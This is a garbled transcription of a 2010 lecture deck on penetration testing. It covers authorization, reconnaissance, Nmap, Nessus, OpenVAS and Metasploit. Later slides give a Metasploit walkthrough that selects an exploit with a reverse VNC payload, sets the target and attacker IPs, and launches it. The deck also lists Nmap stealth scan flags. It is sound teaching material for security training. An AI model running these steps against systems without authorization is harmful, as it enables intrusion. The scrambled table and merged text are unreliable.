Transcription
Penetration Testing12/7/2010Penetration Testing1What Is a Penetration Testing? Testing the security of systems andarchitectures from the point of view of anattacker (hacker, cracker ) A “simulated attack” with a predeterminedgoal that has to be obtained within a fixedtime12/7/2010Penetration Testing2
Penetration Testing Is Not An alternative to other IT security measures –it complements other tests Expensive game of Capture the Flag A guarantee of security12/7/2010Penetration Testing3Authorization Letter Detailed agreements/scope– Anything off limits?– Hours of testing?– Social Engineering allowed?– War Dialing?– War Driving?– Denials of Service?– Define the end point Consult a lawyer before starting the test12/7/2010Penetration Testing4
To Tell or Not to Tell? Telling too many people may invalidate thetest However, you don’t want valuable resourceschasing a non-existent “intruder” very long And, elevation procedures make not tellingrisky12/7/2010Penetration TestingBlack Boxvs. It treats the systemas a "black-box", soit doesn't explicitlyuse knowledge ofthe internalstructure.12/7/20105White Box It allows one to peekinside the "box", andit focuses specificallyon using internalknowledge of thesoftware to guide theselection of test dataPenetration Testing6
OSSTMM OSSTMM – Open-Source Security TestingMethodology ManualVersion 3.0 RC 26 at m.htmIt defines how to go about performing a pentest, but does not go into the actual tools.12/7/2010Penetration Testing7Technique – Penetration Testing1)2)3)4)5)6)Gather InformationScan IP addressesFingerprintingIdentify vulnerable servicesExploit vulnerability (with care!)Fix problems ?12/7/2010Penetration Testing8
Gathering Information Goal – Given a company’s name, determineinformation like:– what IP address ranges they have WHOIS (arin.net ) Nslookup– personal information Social engineering Google we.register.it12/7/2010Penetration Testing9Scan IP Addresses Goal – Given a set of IP addresses, determinewhat services and Operating Systems each isrunning. Nmap – www.nmap.org Gfi languard 12/7/2010Penetration Testing10
Fingerprinting What web server is running?What accounts have I found?What services are running?What OSes are running?Who is logged in?Is there available information on the web site?12/7/2010Penetration Testing11Identify Vulnerable Services Given a specific IP address and port, try to gainaccess to the machine. Report all knownvulnerabilities for this target. Nessus OpenVAS 12/7/2010Penetration Testing12
12/7/2010Penetration Testing1312/7/2010Penetration Testing14
Exploit vulnerability Try to exploit detected vulnerabilities, forexample:– Buffer overflow– Heap overflow– SQL injection– Code injection– Cross-site scripting Metasploit is a framework that allows to testattacks12/7/2010Penetration Testing1512/7/2010Penetration Testing16
AlternativesToolsCore ImpactImmunity Canvas25.000 Open-source (butsome libraries areonly in binaries)-1.450 Open source3 months of updatesand supportmore of 150SecurityForestMetasploitFeaturesLicenseNumber of ExploitsFrequently (weekly)UpdatesPlatform 2500 (at February2005)Frequently (average 4 Occasionally (lastexploit every month) updates in 2005)Only WindowsIndependentOnly WindowsPythonPythonReport system /Integrationwithvulnerabilityassessment tools0-day payloadPerl for framework,many others languagesfor exploits(C,Perl,Python,Ruby,Shell,.)Number of precompiled exploits (seeExploitationTree)Program LanguageAdvantagesFree and Open-source Free and Open-source191 (at October 2007)Occasionally (lastupdates on October2007)IndependentRuby, C, AssemblerFree /IDS-IPS evasion /support to writeexploits and large usedin security communityPenetration TestTutorial12/7/2010Penetration Testing18
Nmap (Network Mapper)Port Division- open, closed, filtered, unfiltered, open filtered andclosed filteredScanning techniques-sS (TCP SYN scan)-sT (TCP connect() scan)-sU (UDP scans)-sA (TCP ACK scan)-sW (TCP Window scan)-sM (TCP Maimon scan)--scanflags (Custom TCP scan)-sI zombie host[:probeport] (Idlescan)-sO (IP protocol scan)-sN; -sF; -sX (TCP Null, FIN, and Xmas scans)-b ftp relay host (FTP bounce scan)12/7/2010Penetration Testing19Identify active hosts and servicesin the network ping sweep useful to identify targets and to verify alsorogue hosts Ex:– nmap -v -sP 192.168.100.0/24 -sP Ping scan. port scanning useful to identify active ports (servicesor daemons) that are running on the targets Ex:– nmap -v -sT 192.168.100.x -sT normal scan -sS stealth scan12/7/2010Penetration Testing20
Identify target OS version OS Fingerprinting: there are differentvalues for each OS (Ex. TCP stack, ) Ex: Nmap –O target linux 2.4ttl64packet length60initial windows5840mss512ip id0enabled tcp opt MNNTNWtimestamp inc. 100hzsackOKSYN attempts512/7/2010linux 2.664605840512randomMNNTNW1000hzOK5openbsdwindows orted unsupportedOKOK43windows 2000windows NTMNWunsupported unsupportedOKOK33Penetration Testing21Vulnerability scanning Nessus is a leader tool in vulnerabilityscanning There are two components :– nessusd server with plugins’ list of knownvulnerabilities (there are different kinds ofsubscription depending on how old are plugins)– nessus is a front end of the tool there are severalversion for windows and linux systems12/7/2010Penetration Testing22
Introduction to Nessus Created by Renaud Deraison Currently Maintained by Tenable Network Security Uses the NASL Scripting language for it’s plugins(currently over 13,000 plugins!) Price is still Free! But no more open source Register to obtain many NASL plugins (7 day delay). Or Purchase a Direct Feed for the Latest!12/7/2010Penetration Testing23Nessus Features Client/Server Architecture SSL/PKI supported Smart Service Recognition– (i.e. FTP on 31337) Non-Destructive or Thorough Tests Vulnerability Mapping to CVE, Bugtraq, and others Vulnerability Scoring using CVSS from NIST.12/7/2010Penetration Testing24
OpenVAS OpenSource Vulnerability Assessment Scanner Previously GNessUs (a GPL fork of the Nessus) OpenVAS is a security scanner to allow futurefree development of the now-proprietaryNESSUS tool OpenVAS now offers 15’000 NetworkVulnerability Tests (NVTs) more all NASLplugins.12/7/2010Penetration Testing25Open VAS technology12/7/2010Penetration Testing26
Exploit vulnerabilities metasploit is a framework that allows toperform real attacks You need to start metasploit from the startmenu(Penetration Test- Framework 3)– msfconsole12/7/2010Penetration Testing27Select the exploit and the payload Select an exploit:– msf use windows/http/altn webadmin– msf exploit(altn webadmin) Select the payload for the exploit (setting thePAYLOAD global datastore)– msf exploit(altn webadmin) set PAYLOAD windows/vncinject/reverse tcp PAYLOAD windows/vncinject/reverse tcp12/7/2010Penetration Testing28
Set options for exploit and payload Show options– msf exploit(altn webadmin) show options Set the options:––––msf set RHOST 192.168.100.x TARGET IPmsf set RPORT 1000 VULNERABLE SERVICEmsf set LHOST 192.168.100.Y ATTACKER IPmsf set TARGET 0 TYPE OF EXPLOIT Launch the exploit– msf exploit(altn webadmin) exploit12/7/2010Penetration Testing29Vulnerabilities disclosure If we find a new vulnerability (Zero DayVulnerability) What we have to do?– Do not say anything and maintain the secret perhaps inthe future the producer will fix it– Spread the information: to all or just to the producer– Which level of detail reveal Full disclosure with possibility of helping cracker? Partial disclosure that could be unuseful?– Sell it 12/7/2010Penetration Testing30
Penetration Testing 12/7/2010 Penetration Testing 1 What Is a Penetration Testing? Testing the security of systems and architectures from the point of view of an attacker (hacker, cracker ) A "simulated attack" with a predetermined goal that has to be obtained within a fixed time 12/7/2010 Penetration Testing 2
